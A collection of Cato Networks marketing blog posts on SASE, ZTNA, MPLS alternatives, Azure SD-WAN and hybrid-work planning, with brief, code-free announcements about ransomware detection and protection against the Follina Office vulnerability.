Converged – A single software stack that combines network, security, and access management as one. This eliminates multiple layers of complexity. There is no need to stitch together bundles of disparate technologies. No need for multiple configuration tools to configure these different technologies. Convergence leads to simplistic architecture, easier management, and lower overall costs to the business.Cloud-Native – Built in the cloud for the cloud. Unlike appliances and virtualized solutions based upon appliances, being cloud-native enables vendor to deliver more flexibility in deployment and scale easier and faster when customers require more capacity.Global – Having a global presence means a network of PoPs everywhere, connected via a global private backbone. This means the network is everywhere the customer business is, delivering guaranteed performance and optimization for all traffic, consistent policy enforcement globally, network resilience to keep the business running.All Edges – Consistently and seamlessly delivering services to all edges (branch, endpoint, data center, cloud) without complex configuration or integration.Unified – A single, unified management console to provision and manage all services. No need to build dashboards to communicate with multiple technologies to manage the deployment .
These are non-negotiable requirements that only a true Cloud-Native SASE solution can deliver. Appendix A highlights how the Cato SASE Cloud compares to appliance-based solutions.
7 Questions You Must Ask Before Selecting Your Next Solution
To solve these issues, here are some key questions to ask yourself and your team. This will help you find the right solution to alleviate these challenges.
1. What real problems are we trying to solve?
Identify what technical challenges are inhibiting you from delivering the best app, networking, and security experience for the business. Discover which projects are on hold because your infrastructure can’t accommodate them. The answers will provide you with insights into the actual problems you need to solve.
2. Which solution solves this, while scaling at the speed of our business?
The natural response when encountering point-problems, is to find a point-solution. When doing so, ask yourself which solution delivers a more holistic approach to all your concerns (from question 1) while also providing a platform that scales at the speed of your business.
3. How can we ensure cost-effective, business continuity?
Business continuity is non-negotiable, so when searching for a solution, ensure you find one that provides a resilient architecture that keeps your business running, no matter what happens.
4. With limited resources, how fast can we deploy new sites?
Your solution shouldn’t just look good on paper, it needs to work well in practice. You can’t wait two, three or six months to launch new branches. Find a solution that enables rapid, zero-touch deployment, with minimal impact on your teams.
5. How can we build and maintain a consistent policy structure?
Multiple configuration tools can create policy mismatches, which in turns, creates gaps and puts your critical applications at risk. To reduce this risk, find a solution that addresses configuration inconsistencies.
6. What’s the right amount of security?
Security is an imperative, so most businesses try to implement multiple solutions with lots of cool-sounding features to make themselves feel secure. Unfortunately, multiple point solutions create security blind spots. Additionally, about 80%-90% of “cool” security features are never used. Achieve more with less by finding a solution that improves your security posture, independent from the size of your corporation or the size of your IT team
7. What’s our best option for global connectivity?
Connectivity can make or break your business. Find a solution that provides increased capacity, guaranteed performance, and a global private backbone. Don’t settle for less.
Mapping Your SASE Journey in 4 Easy Steps
Now that you understand the networking and security challenges adversely affecting your business and their proposed solutions, now it’s time to map out your SASE journey. Doing this can be easier than you might think.
1. Prioritize:
After you’ve answered the above questions, it’s now time to prioritize and create your migration plan. You may have one problem to solve, and in this case it’s easy. But most will have several, so once determined and prioritized, it’s time to plan and put it into action. Of course, Cato and our partners can assist, and even recommend a migration plan.
2. Solve the problem:
This is wholly up to the organization. Some may prefer to tackle low-hanging fruit projects to build confidence in the teams. In this case, easy problems may go first. But others believe in “Go Big or Go Home”, so they may start with the most critical problems first. It’s basically up to the organization to define.
3. Observe:
Observe the “wow” moments of that problem being solved. Whether performance, enhanced security, global connectivity, and so on – observe and enjoy. Then move onto the next problem or project.
4. Repeat and observe.
It’s a straight-forward journey, and a well-defined plan makes it all flow smoothly.
Does Your Solution Allow You to Plan for the Future?
Solving problems the legacy way is how we acquired the complexity beast we have today. So, it’s time we change the game and become more strategic about addressing our IT challenges.
The Cato SASE Cloud does this by converging all the capabilities organizations need today into a single platform, while future-proofing their businesses for whatever is next. In contrast, a non-SASE approach forces you to spend time and resources evaluating, acquiring, and integrating multiple technologies to address each requirement.
Taking a platform approach to your transformation journey will address the challenges of today and prepare you for the opportunities of tomorrow. Taking a Cato SASE approach will enable your network to scale at the speed of your business.
Appendix A – SASE Core Requirements Comparison Chart
Gartner SASE Requirements Cato Appliance Solutions Cato SASE Advantage for Customers Converged Yes One single software stack with the network and security as one NO A mixed collection of appliances that are stitched together. Network and security simplicity and uniformity in policy enforcement can only be achieved through convergence. Cloud-Native Yes Built as a distributed cloud-native service from scratch, with no appliance baggage NO Use virtualized hardware placed in the cloud Easy and inexpensive to scale when increased capacity is required. Customers can scale and grow at the speed of their business, and not be limited by the complexity of a stale network. Global Yes 75+ PoPs available located near every major business center. Each has an independent expansion plan. Limited Relying on IaaS for hosting PoPs limits availability and degrades performance. Growth depends on IaaS plans, not the SASE vendor's Cato’s global private backbone delivers performance guarantees, resiliency and policy consistency between sites across the WAN and cloud. All Edges Yes Designed with light edge connectors (SD-WAN, SDP, Cloud) with a cloud first architecture to deliver same service to all edges Limited Delivering services to different edges requires a different portfolio solution. So, this is only achieved by stitching together portfolio products Connecting and servicing all edges (branch, endpoint, data center, cloud) does not require complex configuration or integration Management Unified One console to control all SD-WAN, security, remote access, and networking policies with full analytics and visibility. Self-service or managed service No Multiple configuration interfaces to navigate A single policy management app eliminates configuration gaps by ensuring consistent policy configurations & enforcement across the entire network.
About Cato Networks
Cato is the world's first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure brach Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever's next.
For any questions about the ideas suggested in this article, and if you have some more of your own, feel free to contact us at: catonetworks.com/contact-us/
As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud,...
Cato’s Ransomware Lab Births Network-based Ransomware Prevention As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation.
Of course, this isn’t our first foray into malware protection. Cato has a rich multilayered malware mitigation strategy of disrupting attacks across the MITRE ATT&CK framework. Cato’s antimalware engine prevents the distribution of malware in general. Cato IPS detects anomalous behaviors used throughout the cyber kill chain. Cato also uses IPS and AM to detect and prevent MITRE techniques used by common ransomware groups, which spot the attack before the impact phase. And, as part of this strategy, Cato security researchers follow the techniques used by ransomware groups, updating Cato’s defenses, and protecting enterprises against exploitation of known vulnerabilities in record time.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
What’s being introduced today are heuristic algorithms specifically designed to detect and interrupt ransomware. The machine-learning heuristic algorithms inspect live SMB traffic flows for a combination of network attributes including:
File properties such as specific file names, file extensions, creation dates, and modification dates,Shared volumes access data such as metrics on users accessing remote folders,Network behavior such as creating certain files and moving across the network in particular ways, andTime intervals such as encrypting whole directories in seconds.
Once found, Cato automatically blocks SMB traffic from the source device, preventing lateral movement or file encryption, and notifies the customer.
The work comes out of our ransomware lab project that we started several months ago. The lab uses a standalone network within Cato where we reproduce ransomware infections in real-life organizations. “We execute them in the lab to understand how they do their encryptions, what file properties they change, and other parts of their operations and then we figure out how to optimize our heuristics to detect and prevent them,” says Tal Darsan, manager of managed security services at Cato. So far, the team has dug into more than dozen ransomware families, including Black Basta, Conti, and Avos Locker.
To get a better sense of what our ransomware protections bring, check out the video below:
For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now...
How to Gradually Deploy SASE in an Enterprise For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified, cloud-delivered service. Gartner predicts that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”SASE converges networking and security into a single architecture that is:
Cloud-nativeGlobally distributedSecureAnd covers all edges
Enterprises can deploy SASE at the flip of a switch or gradually. In this blog post, we list five different gradual deployment use cases that enterprise IT can incorporate. For more detailed explanations, you can read the in-depth ebook that this blog post is based on, “SASE as a Gradual Deployment”.
[boxlink link=”https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider”] 5 Questions to Ask Your SASE Provider | eBook [/boxlink]
Use Case #1: MPLS Migration to SD-WAN
SASE can support running MPLS alongside SD-WAN. In this first use case, enterprises leverage SASE’s SD-WAN functionalities, while turning off MPLS sites at their own schedule. Existing security and remote access solutions remain in place.
Use Case #2: Optimize Global Connectivity
SASE improves performance across global sites and WAN applications. Enterprises can use SASE for global connectivity and keep MPLS connections for critical WAN applications.
Use Case #3: Secure Branch Internet Access
SASE eliminates the need for edge security devices by including new technologies instead. For example, NGFW, IPS, ZTNA, and more. In this use case, MPLS is augmented with SASE security.
Use Case #4: Cloud Acceleration and Control
SASE’s global network of PoPs (Points of Presence) optimizes traffic in the network and to cloud data centers. Enterprises can leverage SASE instead of relying on the erratic Internet.
Use Case #5: Remote Access
SASE optimizes and secures remote traffic. By replacing VPNs with SASE, enterprises can ensure remote access to all edges through a secure network of global PoPs.
Introducing Cato: The World’s First SASE Service
Cato is the world’s first SASE platform, which supports gradual migration while connecting all network resources, including branches, mobile, remote employees, data centers, and more. Through a global and secure cloud-native network, Cato also offers:
Managed threat detection and responseEvent discoveryIntelligent last-mile managementHands-free managementSo much more
To learn more about MPLS to SASE deployment, read the ebook "SASE as a Gradual Deployment".
Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The...
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality.
For IT teams, this abrupt change was unexpected. As a result, organizations did not have the infrastructure in place required to support remote users. At first, IT teams tried to deal with the new situation by stacking up legacy VPN servers. But these appliances did not meet agility, security and scalability demands.
Now, organizations need to find a different strategic solution to enable a productive hybrid workforce that can adapt to future changes. In this blog post, we cover the three main requirements of such a strategic solution and our technological recommendations for answering them.
(For a more in-depth analysis, you can read the ebook “The Hybrid Workforce: Planning for the New Working Reality”, which this blog post is based on.)
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink]
Requirement #1: Seamless Transition Between Home and Office
Most traditional infrastructure, namely MPLS, SD-WAN and NGFW/UTM, is focused on the office. However, there is no infrastructure that extends to remote work and home environments. This extension is required to enable a remote workforce.
Solution #1: ZTNA and SASE
ZTNA (Zero Trust Network Access) and SASE (Secure Access Service Edge) decouple network and security capabilities from physical appliances. Instead, they provide them in the cloud. This solution converges all infrastructure into a single platform that is available to everyone, everywhere.
Requirement #2: Scalable and Globally Distributed Remote Access
Today’s VPNs are appliance-centric, making them resource-intensive when scaling and maintaining them.
Solution #2: Remote Access as a Service
A global cloud service can provide remote access to a significant user base. This will free up IT resources for infrastructure management.
Requirement #3: Optimization and Security for All Traffic
Having remote access is not enough. Teams also need traffic optimization and security for performance and preventing breaches.
Solution #3: A Single Solution for All Needs
Some remote access solutions include optimization and security for all traffic types. This can be done through WAN optimization, cloud acceleration and threat prevention.
Next Steps
A global and agile network and security infrastructure can serve your hybrid workforce and help you prepare for whatever is next. Read the ebook to learn how.
A CIO position is exciting but also challenging, especially if it’s your first role… And, if you don’t plan what you want to accomplish, you...
How to Succeed as a CIO in 100 Days A CIO position is exciting but also challenging, especially if it’s your first role... And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use it to achieve professional success and establish your position as an invaluable business leader. (And, for more in-depth explanations, tips and stats, check out the e-book this blog post is based on.)
Phase 1: Get to Know the Organization and the Team (3 weeks)
The first step at a new company is to get to know the people and learn the company culture. Spend time with your team, stakeholders and company leadership. Use this opportunity to learn about the business, IT’s contribution and where IT fits in the business’s future goals. During these talks, map out any potential gaps or weaknesses you can identify.
To see example questions to ask during these sessions, check out the eBook.
Phase 2: Learn the IT and Security Infrastructure (3 weeks)
Once you’ve understood the expectations from your department, it’s time to learn the network infrastructure and architecture.
Take scope of:
Technologies in use
Potential hazards
SLAs
The delivery model
Existing processes
On-site and off-site work
Digital transformation status
Vendors
Similar to phase one, start mapping out any network strengths and weaknesses.
[boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink]
Phase 3: Set a Strategy and Goals (2 weeks)
Finally, now is the time to determine your strategy for the upcoming year.
Organize your notes from phases 1 and 2.
Research new technologies, tools, trends and capabilities that could be relevant to your industry and requirements.
Map out your department’s strengths, weaknesses, threats and opportunities.
Determine your vision and mission statement.
Define your objectives.
Phase 4: Incorporate Digital Transformation (2 weeks)
According to McKinsey Global, following Covid-19, companies are accelerating digitization by three to seven years, acting even 40 times faster than expected! This means that CIOs who want to be perceived as future leaders need to keep up to date with digital technologies.
Look beyond traditional architectures and into trends like cloudification, convergence and mobility. According to Lars Norling, Director of IT Operations from ADB Safegate “Our analysis clearly showed the shift in the IT landscape, namely extended mobility and the move towards providing core services as cloud services. This led us to look outside of the box, beyond traditional WAN architectures.”
Gartner identifies SASE (Secure Access Service Edge) as the leading transformative technology today. SASE converges network and security into one global cloud service while reducing IT overhead, ensuring speed and performance and incorporating the latest security solutions.
Phase 5: Set Priorities (2 weeks)
Are you excited to get started on executing your plan? It’s almost time to do so. But first, prioritize the activities you want to take on, based on business requirements, ROI, urgency and risks.
Day 101
The steps above are intended to help you make days 101 and onwards a smashing success. So go over your plans, take a deep breath and get started. Good luck!
To learn more about digital transformation and SASE, let’s talk.
Read more about your first 100 days in the ebook, “Your First 100 Days as CIO: 5 Steps to Success”.
ZTNA is a Good Start for Security Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave...
ZTNA Alone is Not Enough to Secure the Enterprise Network ZTNA is a Good Start for Security
Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave the organization vulnerable to attack and are ill-suited to the modern distributed enterprise. Zero trust, which retracts the “perimeter” to a single asset, provides better security and access management for corporate IT resources regardless of their deployment location.
In many cases, zero trust network access (ZTNA) is an organization’s first step on its zero trust journey. ZTNA replaces virtual private networks (VPNs), which provide a legitimate user with unrestricted access to the enterprise network.
In contrast, ZTNA makes case-by-case access determinations based on access controls. If a user has legitimate access to a particular resource, then they are given access to that resource for the duration of the current session. However, accessing any other resources or accessing the same resource as part of a new session requires re-verification of the user’s access.
The shift from unrestricted access to case-by-case access on a limited basis provides an important first step towards implementing an effective zero trust security strategy.
Adopting ZTNA Alone Is Not Enough
The purpose of ZTNA is to prevent illegitimate access to an organization’s IT resources. If a legitimate user account attempts to access a resource for which they lack the proper permissions, then that access request is denied.
This assumes that all threats originate from outside the organization or from users attempting to access resources for which they are not authorized. However, several scenarios exist in which limiting access to authorized accounts does not prevent attacks.
[boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink]
Compromised or Malicious Accounts
ZTNA limits access to corporate resources to accounts that have a legitimate need for that access. However, an account with legitimate access can be abused to perform an attack.
One of the most common cyberattacks is credential stuffing attacks in which an attacker tries to use a certain individual’s compromised credentials for one account to log into another account. If successful, the attacker has access to an account with legitimate access whose requests may be accepted by a ZTNA solution. If this is the case, then an attacker can use this compromised account to steal sensitive data, plant malware, or perform other malicious actions.
Additionally, not all threats originate from outside of the organization. An employee could cause a data breach either via negligence or intentionally. For example, 29% of employees admit to taking company data with them when leaving a job. Legitimate users could also accidentally deploy malware on the corporate network. In 2021, 80% of ransomware was self-installed, meaning that the user opened or executed a malicious file that installed the malware. If this occurred on the corporate network, it would be within the context of a legitimate user account.
Infected Devices
Users access corporate resources via computers or mobile devices. While a ZTNA solution may be configured to look for a combination of a user account and a known device, this device may not be trustworthy.
Devices infected with malware may attempt to take advantage of a user’s account and assigned permissions to gain access to the corporate network or other resources. If malware is installed on a user’s device, it may spread to the corporate network via legitimate accounts.
ZTNA’s access control policies alone are not enough to protect against infected devices. Solutions also need to include device posture monitoring to provide more information about the risk posed by a particular device. Common device posture monitoring features include identifying the security tools running on the device, the current patch level, and compliance with corporate security policies. Ideally, a ZTNA solution should provide the ability to tune device posture access requirements based on the requested resources and to incorporate other valuable information, such as the device OS and location.
ZTNA Should Be Deployed as Part of SASE
ZTNA is an invaluable tool for providing secure remote access to corporate resources. Its integrated access controls and case-by-case grants of access offer far greater security than a VPN. However, as mentioned above, ZTNA is not enough to implement zero trust security or to effectively secure an organization’s network and resources against attack. An attacker with access to a legitimate account - via compromised credentials or an infected device - may be granted access to corporate IT assets.
Effective zero trust security requires partnering ZTNA’s access control with security solutions capable of identifying and preventing abuse of a legitimate user account. Next-generation firewalls (NGFWs), intrusion prevention systems (IPS), cloud access security brokers, and other solutions can help to address the threats that ZTNA misses.
These capabilities can be deployed as standalone solutions, but this often results in a tradeoff between performance and security. Deploying perimeter-based defenses requires routing traffic through that perimeter, which adds unacceptable latency. On the other hand, most organizations lack the resources to deploy a full security stack at all of their on-prem and cloud-based service locations.
Secure Access Service Edge (SASE) provides enterprise-grade security without sacrificing network performance. By integrating a full network security stack into a single solution, SASE enables optimized performance by ensuring that expensive operations - such as decrypting a traffic stream for analysis - are only performed once. Its integrated network optimization capabilities and cloud-based deployment ensure high network performance and reliability, especially when backed by Cato’s network of dedicated backbone links between PoPs.
ZTNA as a standalone solution doesn’t meet corporate network security goals or business requirements. Deploying ZTNA as part of a SASE solution is the right choice for organizations looking to effectively implement zero trust.
Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems. Earlier today...
Cato Protects Against Microsoft Office Follina Exploits Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems.
Earlier today Microsoft issued CVE-2022-30190 that describes the remote code execution (RCE) vulnerability within Office. It can be exploited when the Microsoft Support Diagnostic Tool (MSDT) is called using by a URL from a calling application such as Word.
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
The vulnerability was discovered by nao_sec, the independent cybersecurity research team, who found a Word document ("05-2022-0438.doc") uploaded to VirusTotal from an IP address in Belarus. The Microsoft post explained how to create the payload and various work arounds.
Describing the vulnerability, nao_sec writes on Twitter, “It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code." The Hackernews quotes security researcher Kevin Beaumont, saying that “the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload.”
Beaumont has dubbed the flaw "Follina," because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Cato Immediately Protects Users Worldwide
Within hours of Microsoft’s reporting, Cato researchers were already working on implementing protections for Cato customers worldwide. Already, Cato’s multilayered security defense fully protected Cato-connected users. While no further action is needed, Cato customers are advised to patch any affected systems.
There are currently three ways attackers can exploit this attack:
Users can download a file or application containing the payload that will invoke the MSDT locally.
Users can download a file or application containing the payload that will get the invocation from the Internet (from the attacker’s sites)
User’s browser receives the payload in the response to direction from a malicious site, runs MSDT.
All three approaches are already blocked using the Cato Advanced Threat Prevention (ATP) capabilities. Cato’s anti-malware inspects and will block downloading of files or applications with the necessary payload to execute Follina. Cato IPS will detect and prevent any invocation from across the network or the Internet.
As we have witnessed with Log4j, vulnerabilities such as these can take organizations a very long time to patch. Log4j exploitations are still observed to this day, six months after its initial disclosure. With Cato, enterprises no longer see the delays from patching and are protected in record time.
Demonstration of Attack Exploiting CVE-2022-30190
MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services...
What Others Won’t Tell You About MPLS MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network.
5 Considerations for Evaluating MPLS and Its Alternatives
1. Agility: Can Your Network Move at the Speed of Business?
Modern enterprises need a solution that enables them to expand their business quickly and connect new sites to their existing networks. But traditional MPLS requires rolling out permanent infrastructure, which can take months and keeps businesses dependent on telco service and support.
2. Cost: Is Your Cost Per Megabit Too High?
The modern enterprise network is internet-bound, which makes it bandwidth-intensive. Enterprises need a solution that is priced in an internet-friendly manner since counting every megabit is counter-productive. But MPLS costs are megabit-based, and each megabit is pricey. Redundant circuits, resilient routing and WAN optimization drive the bill even higher.
3. Flexibility: Can The Business Transition Between On and Off-site Work?
New, post-pandemic workplaces have to be able to automatically transition between remote and on-site work. But in case of connectivity issues, transitioning to MPLS backups could cause significant delays that impede productivity.
4. Security: Can Enterprise Users Access Resources Anywhere?
To support remote work and a distributed workforce, resources, users, data and applications need to be secured wherever they are. But MPLS VPNs are hard to manage and backhauling traffic to the data centers adds latency, making the network vulnerable.
5. Management: Do You Have Visibility and Control of Your Network?
Modern businesses need co-managed networks so they can have visibility and control without having to take care of all the heavy lifting. But MPLS requires businesses to control the entire network or hand it all over to telcos.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=other_mpls"] What Others Won’t Tell You About MPLS | Download eBook [/boxlink]
Is SD-WAN the Solution for MPLS’s Shortcomings?
SD-WAN can replace some types of MPLS traffic, saving businesses from many of MPLS’ costs. However, MPLS doesn’t answer all business needs, including:
Cloud - SD-WAN focuses on physical WAN.
Security - SD-WAN employs only basic security features.
Remote and Hybrid Work - SD-WAN is a branch-oriented solution that cannot support remote work on its own.
Visibility - SD-WAN requires adding more vendors, which creates fragmented visibility.
How SASE Answers All Future WAN Needs
The solution for all future enterprise network needs is a converged solution that includes SD-WAN, a global backbone, pervasive security, and remote access in a single cloud offering.
A SASE platform offers just that:
A single platform for all capabilities, which can be activated separately at the flip of a switch.
A global WAN backbone over the cloud, ensuring traffic runs smoothly with minimal latency across global PoPs.
A unified security-as-a-service engine by converging ZTNA with SD-WAN.
A single pane of glass for all policies, configurations, monitoring, and analytics.
Flexible management - self-service, co-managed, or fully managed.
Read more about MPLS vs. SASE in the complete eBook, What Others Won’t Tell You About MPLS.
As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs...
Azure SD-WAN: Cloud Datacenter Integration with Cato Networks As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs and complexity. There’s been no good approach to building an Azure SD-WAN — until now. Cato’s approach to Azure SD-WAN improves performance AND simplifies security, affordably. Let’s see how.
Azure SD-WAN’s MPLS and SD-WAN Problem
When organizations start relying on Azure, two problems become increasingly apparent. First, how do you secure your Azure instance? Running virtual firewalls in Azure adds complexity and considerable expense, necessitating purchase of additional cloud compute resources and third-party licenses. What’s more, virtual firewalls are limited in capacity, requiring upgrades as traffic grows. Cloud performance may suddenly decline because the firewall is choking the network. Adding other cloud instances requires additional tools, complicating operations.
You can continue to rely on your centralized security gateway, backhauling traffic from branch office inspection by the gateway before sending the traffic across the Internet to Azure. You can even improve the connection between the gateway and Azure with a premium connectivity service, such as Azure ExpressRoute. But, and here’s the second issue, how do you deal with the connectivity problem?
Branch offices that might otherwise be a short hop away from an Azure entrance point must now send traffic back to the centralized gateway for inspection before reaching Azure. The approach does nothing for mobile users who sit off the MPLS network regardless.
And what happens as your cloud strategy evolves and you add other cloud datacenter services, such as Amazon AWS or Google Cloud? Now you need a whole new set of security and connectivity solutions adding even more cost and complexity.
Nor does edge SD-WAN help. There’s no security built into edge SD-WAN, so you haven’t addressed that problem. There’s also no private global network so you’re still reliant on MPLS for predicable connectivity. Edge SD-WAN solutions also require the cost and complexity of deploying additional edge SD-WAN appliances to connect to the Azure cloud. And, again, none of this helps with mobile users, which are also out of scope for edge SD-WAN.
[boxlink link="https://www.catonetworks.com/resources/migrating-your-datacenter-firewall-to-the-cloud/?utm_source=blog&utm_medium=top_cta&utm_campaign=cloud_datacenter"] Migrating your Datacenter Firewall to the Cloud | Download eBook [/boxlink]
How Azure SD-WAN Works to Connect Cato and Azure
Cato addresses all of the connectivity and security challenges of Azure SD-WAN. Cato’s global private backbone spans more than 75+ points of presence (PoPs) across the globe, providing affordable premium connectivity worldwide. Many of those Cato PoPs collocate within the same physical datacenters as entrance points to Azure. Connecting from Azure to Cato is only matter of crossing a fast, LAN connection, giving Cato customers ExpressRoute-like performance at no additional charge.
To take advantage of Cato’s unique approach, Cato customers do two things. First, to connect Cato and Azure, enterprises take advantage of our agentless configuration, establishing IPsec tunnels between the two services, establishing the PoP as the egress point for Azure traffic. There’s no need to deploy additional agents or virtual appliances. Cato’s will then optimize and route Azure traffic from any Cato PoP along the shortest and fastest path across Cato Cloud to destination PoP.
Second, sites and mobile users send their Azure traffic to Cato by establishing encrypted tunnels across any Internet connection to the nearest Cato PoP. Sites will run a Cato Socket, Cato’s SD-WAN appliance or establish IPsec tunnels from an existing third-party security device, and mobile users run the Cato mobile client on their devices.
Alternatively, if you’d like to leverage all of Cato’s SD-WAN capabilities in Azure, you can easily deploy Cato’s virtual socket instead of IPsec tunnels, which includes automatic PoP selection, high availability, and automatic failover. The beauty of Cato’s virtual socket is that you can easily deploy it in minutes instead of hours. To get started with Cato virtual socket, search for Cato Networks in the Azure marketplace. Then, click Get It Now, and follow the outlined configuration guidelines.
How Azure SD-WAN Secures Azure Resources
In addition to connectivity, Cato’s Azure SD-WAN solution secures cloud resources against network-based threats. Every Cato PoP provides Cato’s complete suite of security services, eliminating the need for backhauling.
Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, that currently includes application-aware next-generation firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB). Cato can further secure your network with a comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints.
Azure instances and all resources connected to Cato, including site, mobile users and other cloud resources, are protected through a common set of security policies, avoiding the complexity that comes with purchasing security tools unique to Azure or other cloud environments.
Azure SD-WAN Benefits
The bottom line is that Azure SD-WAN delivers connectivity and security with minimal complexity and cost:
Superior Microsoft Azure performance
The combination of global Cato PoPs, a global private backbone and Microsoft Azure colocation accelerates Microsoft Azure application performance by up to 20X vs. a typical corporate Internet-based connection. Not only is latency minimized but Cato’s built-in network optimizations further improve data transfer throughput. And all of that is done for branch offices as well as mobile users. The result is a superior user experience without the need for premium cloud provider transport services.
Security and deployment simplicity
With Cato, organizations don’t have to size, procure and manage scores of branch security solutions normally needed for the direct Internet access critical to delivering low latency cloud connectivity. Security is built into Cato Cloud; cloud resources are protected by the same security policy set as any other resource or user on the enterprise backbone. Cato’s agentless configuration also means customers don’t have to install additional SD-WAN appliances in the Azure cloud. These benefits are particularly significant for multi-cloud enabled organizations which normally would require separate connectivity solutions for each private datacenter service. (However, if you’d like to leverage additional capabilities in Azure, you can deploy the integration in minutes with Cato’s virtual Socket.)
Networking and security agility
Cato’s SD-WAN’s simplicity, Azure integration, and built-in security stack enable branch offices and mobile users to get connected to Microsoft Azure in minutes or hours vs. weeks or months for branch office appliance-based SD-WAN.
Affordable and fast ROI
Enterprises get superior cloud performance without paying for the high-cost cost of branch office SD-WAN hardware, carrier SD-WAN services, or Microsoft Azure ExpressRoute transport. Nor do companies need to invest in additional security services to protect cloud resources with Cato.
For more information on how Cato integrates with the cloud, contact Cato Networks or check out this eBook on Migrating your Datacenter Firewall to the Cloud.
Why do you need a SASE RFP? Shopping for a SASE solution isn’t as easy as it sounds… SASE is an enterprise networking and security...
The Only SASE RFP Template You’ll Ever Need Why do you need a SASE RFP?
Shopping for a SASE solution isn’t as easy as it sounds... SASE is an enterprise networking and security framework that is relatively new to the enterprise IT market (introduced by Gartner in 2019.) And less than 3 years young, SASE is often prone to misunderstanding and vendor “marketecture.” Meaning: If you don’t ask the right questions during your sales and vendor evaluation process, you may be locked into a solution that doesn’t align with your current and future business and technology needs.
A Quick Note about Cato’s RFP Template
Do a quick Google search and you’ll find millions of general RFP templates. That being said, Cato’s RFP template only covers the functional requirements of a future SASE deployment. There are no generic RFP requirements in our template, like getting the vendor details of your vendor companies.
So, What Must a SASE RFP Template Include?
Cato Networks has created a comprehensive, 13-page SASE RFP template, which contains all business and functional requirements for a full SASE deployment. Just download the template, fill in the relevant sections to your enterprise, and allow your short-listed vendors to fill in the remainder. While you may see some sections that are not relevant to your particular organization or use case, that's all right. It’s available for your reference, and to help you plan any future projects.
A Sneak Peek at Cato’s RFP Template
If you’d like a preview of Cato Networks’ SASE RFP template, we’re providing you with a high-level outline. Take a look at this "quick-guide", and then download the full SASE RFP template to put it into practice.
[boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfp_template"] SASE RFI/RFP Made Easy | Get the Template [/boxlink]
1. Business and IT overview
You’ll describe your business and IT. Make sure to include enough details for vendors to understand your environment so they can tailor their answers to your specific needs and answer why their solution is valuable to your use case.
2. Solution Architecture
